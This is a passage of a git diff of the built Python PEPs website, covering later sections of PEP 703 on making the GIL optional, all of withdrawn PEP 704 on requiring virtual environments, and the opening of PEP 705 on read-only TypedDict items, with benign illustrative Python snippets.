• There is a global read sequence number that stores the minimum of all active threads’ read sequence numbers. A thread may update the global read sequence number by scanning each thread’s local read sequence number. The reference implementation does this before allocating a fresh mimalloc page if there are restricted pages that could possibly be reused.
  • +
  • An empty mimalloc page may be reused for a different heap or size +class when the global read sequence number is larger than the +page’s tag number.
  • +
+

The condition that the global read sequence number is larger than the +page’s tag is sufficient because it ensures that any thread that had +a concurrent optimistic list or dictionary access is finished with +that access. In other words, there are no threads accessing the +empty blocks in the freed page, so the page can be used for any other +purpose or even returned to the operating system.
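+
To make the bookkeeping concrete, here is a minimal Python model of the scheme. All names are invented for this sketch; the real implementation is C code inside mimalloc and uses atomic operations rather than a plain dict:
+
import threading
+
+class Page:
+    tag = 0  # write sequence number recorded when the page became empty
+
+class SeqState:
+    def __init__(self) -> None:
+        self.global_write = 1  # global write sequence number
+        self.local_read = {}   # thread id -> last observed write number
+
+    def tag_empty_page(self, page: Page) -> None:
+        page.tag = self.global_write
+        self.global_write += 1  # the tagging thread may bump the counter
+
+    def observe(self) -> None:
+        # Called when a thread is *not* inside a list/dict access,
+        # e.g. from the allocator's slow-path allocation function.
+        self.local_read[threading.get_ident()] = self.global_write
+
+    def global_read(self) -> int:
+        # Minimum of all active threads' local read numbers.
+        return min(self.local_read.values(), default=0)
+
+    def may_reuse(self, page: Page) -> bool:
+        # Every thread has advanced past the point where the page was
+        # emptied, so no optimistic access can still touch its blocks.
+        return self.global_read() > page.tag
+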

+
+
+

Optimistic dict and list Access Summary

+

This PEP proposes a technique for thread-safe list and dictionary accesses that typically avoids acquiring locks. This reduces execution overhead and avoids some multi-threaded scaling bottlenecks in common operations, like calling functions and methods. The scheme works by placing temporary restrictions on mimalloc page reuse to ensure that objects’ reference count fields remain valid after objects are freed, so that conditional reference count increment operations are safe. The restrictions are placed on mimalloc pages instead of on individual objects to improve opportunities for memory reuse. The restrictions are lifted as soon as the system can determine that there are no outstanding accesses involving the empty mimalloc page. To determine this, the system uses lightweight per-thread sequence counters and tags pages when they become empty. Once every thread’s local counter is larger than the page’s tag, the page can be reused for any purpose or returned to the operating system. The restrictions are also lifted whenever the cyclic garbage collector runs, because the stop-the-world pause ensures that threads do not have any outstanding references to empty mimalloc pages.

+
+
+
+

Specializing Interpreter

+

The specializing interpreter requires some changes to be thread-safe +when running without the GIL:

+
    +
• Concurrent specializations are prevented by using a mutex. This prevents multiple threads from writing to the same inline cache.
  • +
  • In multi-threaded programs running without the GIL, each bytecode is +only specialized once. This prevents a thread from reading a +partially written inline cache.
  • +
  • Locking also ensures that cached values of tp_version_tag and +keys_version are consistent with the cached descriptors and other +values.
  • +
  • Modifications to inline counters use “relaxed atomics”. In other +words, some counter decrements may be missed or overwritten, but that +does not affect correctness.
  • +
+
+
+

Py_mod_gil Slot

+

In --disable-gil builds, when loading an extension, CPython will check for a new PEP 489-style Py_mod_gil slot. If the slot is set to Py_mod_gil_not_used, then extension loading proceeds as normal. If the slot is not set, the interpreter pauses all threads and enables the GIL before continuing. Additionally, the interpreter will issue a visible warning naming the extension, stating that the GIL was enabled (and why), and describing the steps the user can take to override it.
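+
The decision logic might be sketched as follows. This is illustrative Python pseudocode only; the real check happens in C inside the import machinery, and the helper functions here are stand-ins:
+
import warnings
+
+def pause_all_threads() -> None: ...  # stand-in for interpreter internals
+def enable_gil() -> None: ...         # stand-in for interpreter internals
+
+def load_extension(name: str, slots: dict) -> None:
+    # "Py_mod_gil" is the PEP 489-style slot described above; this
+    # dict-based lookup is purely illustrative.
+    if slots.get("Py_mod_gil") == "Py_mod_gil_not_used":
+        return  # the extension declares support for running without the GIL
+    pause_all_threads()
+    enable_gil()
+    warnings.warn(f"The GIL was enabled to load extension {name!r}; "
+                  "set PYTHONGIL=0 to override.")
+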

+
+
+

PYTHONGIL Environment Variable

+

In --disable-gil builds, the user can also override the behavior at runtime by setting the PYTHONGIL environment variable. Setting PYTHONGIL=0 forces the GIL to be disabled, overriding the module slot logic. Setting PYTHONGIL=1 forces the GIL to be enabled.

+

The PYTHONGIL=0 override is important because extensions that are +not thread-safe can still be useful in multi-threaded applications. For +example, one may want to use the extension from only a single thread or +guard access by locks. For context, there are already some extensions +that are not thread-safe even with the GIL, and users already have to +take these sorts of steps.
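+
For example, a sketch of the lock-guarding approach, where fastcsv stands in for any hypothetical extension that is not thread-safe:
+
import threading
+
+class fastcsv:  # stand-in for a hypothetical non-thread-safe extension
+    @staticmethod
+    def parse(data: bytes) -> list:
+        return [line.split(b",") for line in data.splitlines()]
+
+_lock = threading.Lock()
+
+def parse_rows(data: bytes) -> list:
+    # Serialize every call into the non-thread-safe code; the rest of the
+    # application can still run in parallel under PYTHONGIL=0.
+    with _lock:
+        return fastcsv.parse(data)
+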

+

The PYTHONGIL=1 override is sometimes useful for debugging.

+
+
+
+

Rationale

+
+

Non-Generational Garbage Collection

+

This PEP proposes switching from a generational cyclic garbage +collector to a non-generational collector (when CPython is built +without the GIL). That is equivalent to only having one generation +(the “old” generation). There are two reasons for this proposed +change.

+

Cyclic garbage collection, even for just the young generation, +requires pausing other threads in the program. The author is +concerned that frequent collections of the young generation would +inhibit efficient scaling in multi-threaded programs. This is a +concern for young generations (but not the old generation) because +the young generations are collected after a fixed number of +allocations, while the collections for the older generation are +scheduled in proportion to the number of live objects in the heap. +Additionally, it is difficult to efficiently keep track of objects in +each generation without the GIL. For example, CPython currently uses +a linked list of objects in each generation. If CPython were to keep +that design, those lists would need to be made thread-safe, and it’s +not clear how to do that efficiently.

+

Generational garbage collection is used to good effect in many other language runtimes. For example, many of the Java HotSpot garbage collector implementations use multiple generations [11]. In these runtimes, a young generation is frequently a throughput win: since a large percentage of the young generation is typically “dead,” the GC is able to reclaim a large amount of memory relative to the amount of work performed. For example, several Java benchmarks show that over 90% of “young” objects are typically collected [12] [13]. This is commonly referred to as the “weak generational hypothesis”; the observation is that most objects die young. This pattern is reversed in CPython due to the use of reference counting. Although most objects still die young, they are collected when their reference counts reach zero. Objects that survive to a garbage collection cycle are most likely to remain alive [14]. This difference means that generational collection is much less effective in CPython than in many other language runtimes [15].

+
+
+

Optimistically Avoiding Locking in dict and list Accesses

+

This proposal relies on a scheme that mostly avoids acquiring locks +when accessing individual elements in lists and dictionaries. Note +that this is not “lock free” in the sense of “lock-free” +and “wait-free” algorithms that guarantee forward progress. It +simply avoids acquiring locks (mutexes) in the common case to improve +parallelism and reduce overhead.

+

A much simpler alternative would be to use reader-writer locks to protect dictionary and list accesses. Reader-writer locks allow concurrent reads, but not updates, which might seem ideal for lists and dictionaries. The problem is that reader-writer locks have substantial overhead and poor scalability, particularly when the critical sections are small, as they are for single-element dictionary and list accesses [9]. The poor reader scalability stems from the fact that readers must all update the same data structure, such as the number of readers in pthread_rwlocks.

+

The technique described in this PEP is related to RCU +(“read-copy-update”) [6] and, to a lesser extent, hazard +pointers, two well-known schemes for optimizing concurrent, +read-mostly data structures. RCU is widely used in the Linux kernel +to protect shared data structures in a scalable manner. Both the +technique in this PEP and RCU work by deferring reclamation while +readers may be accessing the concurrent data structure. RCU is most +commonly used to protect individual objects (like hash tables or +linked lists), while this PEP proposes a scheme to protect larger +blocks of memory (mimalloc “pages”) [10].

+

The need for this scheme is largely due to the use of reference +counting in CPython. If CPython only relied on a tracing garbage +collector, then this scheme would probably not be necessary because +tracing garbage collectors already defer reclamation in the required +manner. This would not “solve” scaling issues, but would shift many +of the challenges to the garbage collector implementation.

+
+
+
+

Backwards Compatibility

+

This PEP poses a number of backwards compatibility issues when +building CPython with the --disable-gil flag, but those issues do +not occur when using the default build configuration. Nearly all the +backwards compatibility concerns involve the C-API:

+
    +
  • CPython builds without the GIL will not be ABI compatible with the +standard CPython build or with the stable ABI due to changes to the +Python object header needed to support biased reference counting. +C-API extensions will need to be rebuilt specifically for this +version.
  • +
  • C-API extensions that rely on the GIL to protect global state or +object state in C code will need additional explicit locking to +remain thread-safe when run without the GIL.
  • +
  • C-API extensions that use borrowed references in ways that are not +safe without the GIL will need to use the equivalent new APIs that +return non-borrowed references. Note that only some uses of +borrowed references are a concern; only references to objects that +might be freed by other threads pose an issue.
  • +
  • Custom memory allocators (PyMem_SetAllocator) are required to +delegate the actual allocation to the previously set allocator. For +example, the Python debug allocator and tracing allocators will +continue to work because they delegate the allocation to the +underlying allocator. On the other hand, wholesale replacing of the +allocator (e.g., with jemalloc or tcmalloc) will not work +correctly.
  • +
• Python objects must be allocated through the standard APIs, such as PyType_GenericNew or PyObject_Malloc. Non-Python objects must not be allocated through those APIs. For example, it is currently acceptable to allocate buffers (non-Python objects) through PyObject_Malloc; that will no longer be allowed and buffers should instead be allocated through PyMem_Malloc, PyMem_RawMalloc, or malloc.
  • +
+

There are fewer potential backwards compatibility issues for Python +code:

+
    +
  • Destructors and weak reference callbacks for code objects and +top-level function objects are delayed until the next cyclic +garbage collection due to the use of deferred reference counting.
  • +
• Destructors for some objects accessed by multiple threads may be delayed slightly due to biased reference counting (see the sketch after this list). This is rare: most objects, even those accessed by multiple threads, are destroyed as soon as their reference counts reach zero. Two places in the Python standard library tests required gc.collect() calls to continue to pass.
  • +
+
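+
A sketch of that test pattern follows; on current builds the destructor runs immediately and the gc.collect() branch is simply skipped:
+
import gc
+import threading
+import weakref
+
+class Shared:
+    pass
+
+obj = Shared()
+ref = weakref.ref(obj)
+
+# A second thread briefly takes a reference to the object.
+t = threading.Thread(target=id, args=(obj,))
+t.start()
+t.join()
+
+del obj
+if ref() is not None:
+    # Under biased reference counting the destructor may be slightly
+    # delayed; an explicit collection flushes it (this mirrors the fix
+    # the two standard-library tests needed).
+    gc.collect()
+assert ref() is None
+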
+
+

Distribution

+

This PEP poses new challenges for distributing Python. At least for +some time, there will be two versions of Python requiring separately +compiled C-API extensions. It may take some time for C-API extension +authors to build --disable-gil compatible packages and upload +them to PyPI. Additionally, some authors may be hesitant to support +the --disable-gil mode until it has wide adoption, but adoption +will likely depend on the availability of Python’s rich set of +extensions.

+

To mitigate this, the author will work with Anaconda to distribute +a --disable-gil version of Python together with compatible +packages from conda channels. This centralizes the challenges of +building extensions, and the author believes this will enable more +people to use Python without the GIL sooner than they would otherwise +be able to.

+
+
+

Performance

+

The changes to make CPython thread-safe without the GIL increase execution overhead for --disable-gil builds. The performance impact differs between programs that use only a single thread and programs that use multiple threads, so the table below reports execution overhead separately for each.

Execution Overhead on pyperformance 1.0.6

                    Intel Skylake    AMD Zen 3
One thread          6%               5%
Multiple threads    8%               7%
+

The baseline used to measure overhead is 018be4c from PR 19474, which implements immortal objects for Python 3.12. The largest contribution to execution overhead is biased reference counting, followed by per-object locking. For thread-safety reasons, an application running with multiple threads will only specialize a given bytecode once; this is why the overhead for programs that use multiple threads is larger than for programs that use only one thread. However, with the GIL disabled, programs that use multiple threads should also be able to use multiple CPU cores more effectively.

+

Note that this PEP would not affect the performance of the default +(non --disable-gil) builds of CPython.

+
+
+

Build Bots

+

The stable build bots will also include --disable-gil builds.

+
+
+

How to Teach This

+

As part of implementing the --disable-gil mode, the author will +write a “HOWTO” guide [18] for making packages compatible when +running Python without the GIL.

+
+
+

Reference Implementation

+

There are two GitHub repositories implementing versions of CPython +without the GIL:

+
• nogil-3.12 (https://github.com/colesbury/nogil-3.12)
• nogil (https://github.com/colesbury/nogil)
+

The nogil-3.12 repository is based on Python 3.12.0a4. It is useful for evaluating single-threaded execution overhead and as a reference implementation for this PEP. It is less useful for evaluating C-API extension compatibility because many extensions are not currently compatible with Python 3.12. Due to limited time for the 3.12 port, the nogil-3.12 implementation does not skip all deferred reference counts. As a temporary workaround, the implementation immortalizes objects that use deferred reference counting in programs that spawn multiple threads.

+

The nogil repository is based on Python 3.9.10. It is useful for +evaluating multi-threading scaling in real world applications and +extension compatibility. It is more stable and well tested than the +nogil-3.12 repository.

+
+
+

Alternatives

+

Python currently supports a number of ways to enable parallelism, but +the existing techniques come with significant limitations.

+
+

Multiprocessing

+

The multiprocessing library allows Python programs to start and +communicate with Python subprocesses. This allows for parallelism +because each subprocess has its own Python interpreter (i.e., there’s +one GIL per process). Multiprocessing has a few substantial +limitations. Communication between processes is limited: objects +generally need to be serialized or copied to shared memory. This +introduces overhead (due to serialization) and complicates building +APIs on top of multiprocessing. Starting a subprocess is also more +expensive than starting a thread, especially with the “spawn” +implementation. Starting a thread takes ~100 µs, while spawning a +subprocess takes ~50 ms (50,000 µs) due to Python re-initialization.
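+
These figures are easy to reproduce; the numbers printed by the snippet below vary by machine and operating system, but the gap is typically two to three orders of magnitude:
+
import multiprocessing
+import threading
+import time
+
+def noop() -> None:
+    pass
+
+if __name__ == "__main__":
+    t0 = time.perf_counter()
+    th = threading.Thread(target=noop)
+    th.start(); th.join()
+    print(f"thread start+join: {(time.perf_counter() - t0) * 1e6:.0f} us")
+
+    multiprocessing.set_start_method("spawn")
+    t0 = time.perf_counter()
+    p = multiprocessing.Process(target=noop)
+    p.start(); p.join()
+    print(f"spawn start+join:  {(time.perf_counter() - t0) * 1e6:.0f} us")
+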

+

Finally, many C and C++ libraries support access from multiple +threads but do not support access or use across multiple processes.

+
+
+

Releasing the GIL in C-API Extensions

+

C-API extensions can release the GIL around long-running functions. This allows for some degree of parallelism, since multiple threads can run concurrently when the GIL is released, but the overhead of acquiring and releasing the GIL typically prevents this from scaling efficiently beyond a few threads. Many scientific computing libraries release the GIL in computationally heavy functions, and the CPython standard library releases the GIL around blocking I/O.
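+
For instance, zlib is one standard-library module that releases the GIL around compression, so a thread pool can already use multiple cores for this kind of workload:
+
import zlib
+from concurrent.futures import ThreadPoolExecutor
+
+data = b"example " * 1_000_000  # ~8 MB of compressible input
+
+with ThreadPoolExecutor(max_workers=4) as pool:
+    # zlib releases the GIL while compressing, so these calls can run on
+    # multiple cores; the GIL is still re-acquired around each call.
+    results = list(pool.map(zlib.compress, [data] * 8))
+
+print(len(results), "buffers compressed")
+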

+
+
+

Internal Parallelization

+

Functions implemented in C may use multiple threads internally. For +example, Intel’s NumPy distribution, PyTorch, and TensorFlow all use +this technique to internally parallelize individual operations. This +works well when the basic operations are large enough to be +parallelized efficiently, but not when there are many small +operations or when the operations depend on some Python code. Calling +into Python from C requires acquiring the GIL – even short snippets +of Python code can inhibit scaling.

+
+
+ +
+

Rejected Ideas

+
+

Why Not Use a Concurrent Garbage Collector?

+

Many recent garbage collectors are mostly concurrent – they avoid long +stop-the-world pauses by allowing the garbage collector to run +concurrently with the application. So why not use a concurrent +collector?

+

Concurrent collection requires write barriers (or read barriers). The +author is not aware of a way to add write barriers to CPython without +substantially breaking the C-API.

+
+
+

Why Not Deprecate PyDict_GetItem in Favor of PyDict_FetchItem?

+

This PEP proposes a new API PyDict_FetchItem which behaves like +PyDict_GetItem, but returns a new reference instead of a borrowed +reference. As described in Borrowed References, some uses of +borrowed references that were safe when running with the GIL are +unsafe when running without the GIL and need to be replaced by +functions like PyDict_FetchItem that return new references.

+

This PEP does not propose deprecating PyDict_GetItem and similar +functions that return borrowed references for a few reasons:

+
    +
  • Many of the uses of borrowed references are safe, even when running +without the GIL. For example, C API functions often use +PyDict_GetItem to retrieve items from the keyword +argument dictionary. These calls are safe because the keyword +argument dictionary is only visible to a single thread.
  • +
  • I tried this approach early on and found that wholesale replacing of +PyDict_GetItem with PyDict_FetchItem frequently introduced +new reference counting bugs. In my opinion, the risk of +introducing new reference counting bugs generally outweighs the +risks of missing a PyDict_GetItem call that is unsafe without +the GIL.
  • +
+
+
+

Why Not Use PEP 683 Immortalization?

+

Like PEP 683, this PEP proposes an immortalization scheme for +Python objects, but the PEPs use different bit representations to +mark immortal objects. The schemes cannot be identical because this +PEP depends on biased reference counting, which has two reference +count fields instead of one.

+
+
+
+

Open Issues

+
+

Improved Specialization

+

The Python 3.11 release introduced quickening and specialization as part +of the faster CPython project, substantially improving performance. +Specialization replaces slow bytecode instructions with faster +variants [19]. To maintain thread-safety, applications that use +multiple threads (and run without the GIL) will only specialize each +bytecode once, which can lower performance on some programs. It is +possible to support specializing multiple times, but that requires more +investigation and is not part of this PEP.

+
+
+

Python Build Modes

+

This PEP introduces a new build mode (--disable-gil) that is not +ABI compatible with the standard build mode. The additional build +mode adds complexity for both Python core developers and extension +developers. The author believes a worthwhile goal is to combine +these build modes and have the global interpreter lock controlled at +runtime, possibly disabled by default. The path to this goal remains +an open issue, but a possible path might look like the following:

+
    +
  1. In 2024, CPython 3.13 is released with support for a +--disable-gil build time flag. There are two ABIs for +CPython, one with the GIL and one without. Extension authors +target both ABIs.
  2. +
3. After 2–3 releases (i.e., in 2026–2027), CPython is released with the GIL controlled by a runtime environment variable or flag. The GIL is enabled by default. There is only a single ABI.
  4. +
5. After another 2–3 releases (i.e., 2028–2030), CPython switches to the GIL being disabled by default. The GIL can still be enabled at runtime via an environment variable or command line flag.
  6. +
+

This PEP covers the first step, with the remaining steps left as open +issues. In this scenario, there would be a two to three year period +where extension authors would target an extra CPython build per +supported CPU architecture and OS.

+
+
+

Integration

+

The reference implementation changes approximately 15,000 lines of code in CPython and includes mimalloc, which is also approximately 15,000 lines of code. Most changes are not performance sensitive and can be included in both --disable-gil and the default builds. Some macros, like Py_BEGIN_CRITICAL_SECTION, will be no-ops in the default build. The author does not expect a huge number of #ifdef statements to support the --disable-gil builds.

+
+
+

Mitigations for Single-Threaded Performance

+

The changes proposed in this PEP will increase execution overhead for --disable-gil builds compared to Python builds with the GIL. In other words, --disable-gil builds will have slower single-threaded performance. There are some possible optimizations to reduce execution overhead, especially for --disable-gil builds that only use a single thread. These may be worthwhile if a longer term goal is to have a single build mode, but the choice of optimizations and their trade-offs remain an open issue.

+
+
+
+

References

+ +
+
+

Acknowledgments

+

Thanks to Hugh Leather, Łukasz Langa, and Eric Snow for providing +feedback on drafts of this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0703.rst

+

Last modified: 2024-10-17 12:49:39 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0704/index.html b/pep-0704/index.html new file mode 100644 index 00000000000..e31fb1a406f --- /dev/null +++ b/pep-0704/index.html @@ -0,0 +1,312 @@ PEP 704 – Require virtual environments by default for package installers | peps.python.org
+
+


+ + +
+
+
+

PEP 704 – Require virtual environments by default for package installers

+
+
Author:
+
Pradyun Gedam <pradyunsg at gmail.com>
+
Sponsor:
+
Brett Cannon <brett at python.org>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
16-Jan-2023
+
Post-History:
+
16-Jan-2023
+
+
+
+
+
+

Abstract

+

This PEP recommends that package installers like pip require a virtual environment by default on Python 3.13+.

+
+
+

PEP Withdrawal

+

During discussion of this PEP, it became clear that changes to pip’s UX are not controlled by PEPs as proposed. It also became clear that a significant number of users rely on being able to mix managed-by-pip dependencies with managed-by-some-other-tool dependencies (most prominently, when using Conda).

+

Further, a significant subset of the benefits of the proposed change are achievable via PEP 668 (accepted and implemented at the time of writing). It provides redistributors of the Python interpreter control over whether users should be required to use a virtual environment, what the messaging presented to the user is and how the rollout of that change should happen for their users.

+

Since enforcement of virtual environments with pip was the primary focus of this PEP, it felt more appropriate to withdraw this PEP than to refocus it on a different topic.

+

A future PEP to resolve the virtual environment naming convention question/issues would still be appropriate, but it’s worth starting any such effort as a fresh PEP focused on the benefits of such a convention, rather than on the enforcement of it.

+
+
+

Motivation

+

Python virtual environments are an essential part of the development workflow for Python. However, they require extra effort since they are an opt-in feature, and require users to either:

+
    +
  • take explicit steps to activate/deactivate a virtual environment
  • +
  • use <path-to-venv>/<bin-path>/<executable> to run files
  • +
+

For new users, things will seemingly work correctly when virtual environments are not used, until they don’t. Further, activating a virtual environment uses slightly different syntax and mechanisms on different platforms. This complicates the introduction to virtual environments, since information and context about how/why they are useful needs to be explained to justify adding additional steps to the workflow.

+

It also creates scope for mistakes, since users need to remember either to activate the virtual environment before running an installer like pip, or to configure those installers to error out. On certain Linux distributions, forgetting to do so can result in the installer modifying files that are owned by the operating system (this is partially mitigated by PEP 668 for distributions that opt in to marking their environments accordingly).

+
+
+

Rationale

+

Changing the default behaviour of installers like pip to require a virtual environment to be active would:

+
    +
  • make it easier for new users to get started with Python (since there’s a consistent experience and virtual environments are understood as a thing you’re required to use)
  • +
  • reduce the scope for accidental installation issues for all users by default (by explicitly flagging when you’re not using a virtual environment).
  • +
+

Setting up a convention of placing the virtual environment in-tree in a directory named .venv removes a decision point for common workflows and creates a clear convention within the ecosystem.

+
+
+

Specification

+
+

Requiring a virtual environment by default

+

When a user runs an installer without an active virtual environment, the installer SHOULD print an error message and exit with a non-zero exit code.

+

The error message SHOULD inform the user that a virtual environment is required, SHOULD provide shell-specific instructions on how to create and activate a virtual environment named .venv, and SHOULD provide a link to a documentation page that explains how to create and activate a virtual environment.

+

See Implementation Notes for more details.
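+
A minimal sketch of the recommended check is shown below; the exact message wording and the documentation URL are illustrative, not mandated by this PEP:
+
import sys
+
+def ensure_virtual_environment() -> None:
+    in_venv = sys.base_prefix != sys.prefix or hasattr(sys, "real_prefix")
+    if not in_venv:
+        sys.stderr.write(
+            "ERROR: a virtual environment is required.\n"
+            "Create and activate one, for example:\n"
+            "    python -m venv .venv\n"
+            "    source .venv/bin/activate    (POSIX shells)\n"
+            "    .venv\\Scripts\\activate      (Windows)\n"
+            "See <https://docs.example/venvs> for details.\n"
+        )
+        raise SystemExit(1)
+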

+
+
+

Opting out of virtual environments

+

The installer SHOULD also provide an explicit opt-in to disable this requirement, allowing an end user to use it outside of a virtual environment. If the installer does not provide this functionality, it SHOULD mention this in the error message and documentation page.

+
+
+

Consistent timeline for the change

+

Installers MAY choose to implement this default behaviour on any Python version, but SHOULD implement it on Python 3.13 or newer.

+
+
+
+

Backwards Compatibility

+

This PEP is backwards incompatible with workflows where users are using installers outside of virtual environments. Such users will be prompted with an error message and will need to either:

+
    +
  • explicitly opt-in to running the installer outside of a virtual environment, or
  • +
  • create and use a virtual environment
  • +
+

Users who are already using virtual environments will not be affected by this change.

+

Workflow tools (which manage virtual environments for the user, under the hood) should be unaffected, since they should already be using a virtual environment for running the installer.

+
+
+

Security Implications

+

This PEP does not introduce any new security implications.

+
+
+

How to Teach This

+

This PEP requires that new users create and use a virtual environment to get started with using Python packages. This is, however, a best practice, as demonstrated by the section on the “basics of how to install Python packages” in the Python Packaging User Guide, which explains what virtual environments are and why they are useful before discussing the use of pip.

+
+
+

Reference Implementation

+

There is no reference implementation for this PEP. However, the proposed behaviour is largely already implemented in pip and can be activated by setting the PIP_REQUIRE_VENV environment variable to 1. (Leaving it unset results in the proposed opt-in behaviour of not requiring a virtual environment for installation.)
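+
For example, the existing pip behaviour can be exercised as follows (requests is used only as an example package; outside a virtual environment, pip exits with an error):
+
import os
+import subprocess
+import sys
+
+env = dict(os.environ, PIP_REQUIRE_VENV="1")
+# With PIP_REQUIRE_VENV=1, pip refuses to install outside a virtual
+# environment -- essentially the default this PEP proposed.
+result = subprocess.run(
+    [sys.executable, "-m", "pip", "install", "requests"], env=env
+)
+print("pip exit code:", result.returncode)
+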

+
+
+

Implementation Notes

+
+

Detecting an active virtual environment

+

As discussed in PEP 668, the logic for robustly detecting a virtual environment is something like:

+
import sys
+
+def is_virtual_environment():
+    return sys.base_prefix != sys.prefix or hasattr(sys, "real_prefix")
+
+
+
+
+

Documentation on using a virtual environment

+

Package installers are expected to provide a link to a documentation page in the error message.

+

Ideally, such a documentation page would explain what virtual environments are, why they are required, and how to create and activate a virtual environment using venv. It should include instructions for the most common shells and platforms.

+

Such a documentation page should be made available in the Python Packaging User Guide to reduce duplicated effort across installers for covering this topic.

+
+
+
+

Rejected Ideas

+
+

Do not specify a name for the virtual environment directory

+

Using a consistent name for the virtual environment directory is important for a few reasons:

+
    +
  1. It makes it easier for users to find the virtual environment directory, and to activate it.
  2. +
  3. It removes a decision point for new users, since they do not need to decide on a name for the virtual environment directory.
  4. +
  5. It creates a clear convention within the ecosystem, which makes it easier for users to find documentation.
  6. +
  7. It ensures consistency across different tools, so that differences in the error messages do not confuse users.
  8. +
+
+
+

Use a different name for the virtual environment directory

+

Functionally, the directory name does not matter much as long as there is a single consistent suggestion.

+

The name .venv was picked since it:

+
    +
  1. does not conflict with any valid Python import name
  2. +
3. does not conflict with the venv module in the standard library
  4. +
  5. has pre-existing usage in the Python community
  6. +
  7. has support for auto-detection in common text editors
  8. +
  9. can be typed without modifier keys on common keyboard layouts
  10. +
+
+
+

Do not couple tooling behaviour with a Python version

+

This PEP creates a coupling between the behaviour of installers and the Python version.

+

This rollout mechanism is already being used for behaviour changes in the installation tooling. For example, pip on Python 3.11 will use importlib.metadata instead of pkg_resources for parsing/fetching package metadata, and sysconfig instead of distutils.sysconfig for getting the paths to unpack wheels into.

+

The difference with those cases is that they’re supposed to be largely transparent to end users. This PEP is proposing a behaviour change that is not transparent to end users, and requires them to take action.

+

The primary benefit of this is that it allows for redistributors to adapt their tooling in time for the new Python version and provides a clear and consistent point for change across the ecosystem. It also puts a clear deadline on when the default behaviour will consistently require a virtual environment by default (once Python 3.12 goes end-of-life).

+

The primary issue with this approach is that it enforces a behaviour change on users when they upgrade to a new Python version, which can hamper the adoption of a new Python version. However, this is a migration/upgrade for existing users and it is a common expectation that some changes will be needed for migration/upgrades.

+

The author of this PEP believes that the benefits of applying this consistently throughout the ecosystem with a deadline outweigh the drawbacks of enforcing a best-practice on users when they upgrade.

+
+
+
+

Open Issues

+

None.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0704.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0705/index.html b/pep-0705/index.html new file mode 100644 index 00000000000..c6245ab7a84 --- /dev/null +++ b/pep-0705/index.html @@ -0,0 +1,731 @@ PEP 705 – TypedDict: Read-only items | peps.python.org
+
+


+ + +
+
+
+

PEP 705 – TypedDict: Read-only items

+
+
Author:
+
Alice Purcell <alicederyn at gmail.com>
+
Sponsor:
+
Pablo Galindo <pablogsal at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
07-Nov-2022
+
Python-Version:
+
3.13
+
Post-History:
+
30-Sep-2022, +02-Nov-2022, +14-Mar-2023, +17-Oct-2023, +04-Nov-2023
+
Resolution:
+
29-Feb-2024
+
+
+
+
+
+

Attention

+

This PEP is a historical document: see typing.ReadOnly type qualifier and +typing.ReadOnly for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+


+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

PEP 589 defines the structural type TypedDict for dictionaries with a fixed set of keys. +As TypedDict is a mutable type, it is difficult to correctly annotate methods which accept read-only parameters in a way that doesn’t prevent valid inputs.

+

This PEP proposes a new type qualifier, typing.ReadOnly, to support these usages. It makes no Python grammar changes. Correct usage of read-only keys of TypedDicts is intended to be enforced only by static type checkers, and will not be enforced by Python itself at runtime.

+
+
+

Motivation

+

Representing structured data using (potentially nested) dictionaries with string keys is a common pattern in Python programs. PEP 589 allows these values to be type checked when the exact type is known up-front, but it is hard to write read-only code that accepts more specific variants: for instance, where values may be subtypes or restrict a union of possible types. This is an especially common issue when writing APIs for services, which may support a wide range of input structures, and typically do not need to modify their input.

+
+

Pure functions

+

Consider trying to add type hints to a function movie_string:

+
def movie_string(movie: Movie) -> str:
+    if movie.get("year") is None:
+        return movie["name"]
+    else:
+        return f'{movie["name"]} ({movie["year"]})'
+
+
+

We could define this Movie type using a TypedDict:

+
from typing import NotRequired, TypedDict
+
+class Movie(TypedDict):
+    name: str
+    year: NotRequired[int | None]
+
+
+

But suppose we have another type where year is required:

+
class MovieRecord(TypedDict):
+    name: str
+    year: int
+
+
+

Attempting to pass a MovieRecord into movie_string results in the error (using mypy):

+
Argument 1 to "movie_string" has incompatible type "MovieRecord"; expected "Movie"
+
+
+

This particular use case should be type-safe, but the type checker correctly stops the +user from passing a MovieRecord into a Movie parameter in the general case, because +the Movie class has mutator methods that could potentially allow the function to break +the type constraints in MovieRecord (e.g. with movie["year"] = None or del movie["year"]). +The problem disappears if we don’t have mutator methods in Movie. This could be achieved by defining an immutable interface using a PEP 544 Protocol:

+
from typing import Literal, Protocol, overload
+
+class Movie(Protocol):
+    @overload
+    def get(self, key: Literal["name"]) -> str: ...
+
+    @overload
+    def get(self, key: Literal["year"]) -> int | None: ...
+
+    @overload
+    def __getitem__(self, key: Literal["name"]) -> str: ...
+
+    @overload
+    def __getitem__(self, key: Literal["year"]) -> int | None: ...
+
+
+

This is very repetitive, easy to get wrong, and is still missing important method definitions like __contains__() and keys().

+
+
+

Updating nested dicts

+

The structural typing of TypedDict is supposed to permit writing update functions that only constrain the types of items they modify:

+
class HasTimestamp(TypedDict):
+    timestamp: float
+
+class Logs(TypedDict):
+    timestamp: float
+    loglines: list[str]
+
+def update_timestamp(d: HasTimestamp) -> None:
+    d["timestamp"] = now()
+
+def add_logline(logs: Logs, logline: str) -> None:
+    logs["loglines"].append(logline)
+    update_timestamp(logs)  # Accepted by type checker
+
+
+

However, this no longer works once you start nesting dictionaries:

+
class HasTimestampedMetadata(TypedDict):
+    metadata: HasTimestamp
+
+class UserAudit(TypedDict):
+    name: str
+    metadata: Logs
+
+def update_metadata_timestamp(d: HasTimestampedMetadata) -> None:
+    d["metadata"]["timestamp"] = now()
+
+def rename_user(d: UserAudit, name: str) -> None:
+    d["name"] = name
+    update_metadata_timestamp(d)  # Type check error: "metadata" is not of type HasTimestamp
+
+
+

This looks like an error, but is simply due to the (unwanted) ability to overwrite the metadata item held by the HasTimestampedMetadata instance with a different HasTimestamp instance, that may no longer be a Logs instance.

+

